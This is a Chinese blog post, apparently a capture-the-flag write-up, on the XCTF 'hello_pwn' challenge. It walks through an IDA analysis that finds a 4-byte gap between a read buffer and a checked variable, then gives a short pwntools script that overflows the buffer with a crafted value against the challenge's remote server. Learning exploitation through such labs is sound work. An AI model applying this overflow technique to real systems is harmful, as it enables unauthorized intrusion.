美文网首页
hello_pwn攻防世界pwn

hello_pwn攻防世界pwn

作者: 杰_74 | 来源:发表于2019-08-09 09:58 被阅读0次

    checksec然后试运行


    放入64位ida,看看main函数


    点击read函数里的unk_601068,再点击if函数里的dword_60106C,发现他们只相差了0x601068-0x60106c=0x4,再点击sub_400686(),发现了拿到flag的地方


    现在就很明朗了,用read函数栈溢出覆盖地址


    点击h把int转成16进制

    写脚本

    #coding=utf8
    from pwn import *
    context.log_level = 'debug'
    p = remote('111.198.29.45',37550)
    
    payload = ''
    payload += 0x4*'A'
    payload += p64(0x6E756161)
    
    p.sendline(payload)
    p.interactive()
    
    成功

    相关文章

      网友评论

          本文标题:hello_pwn攻防世界pwn

          本文链接:https://www.haomeiwen.com/subject/xihcjctx.html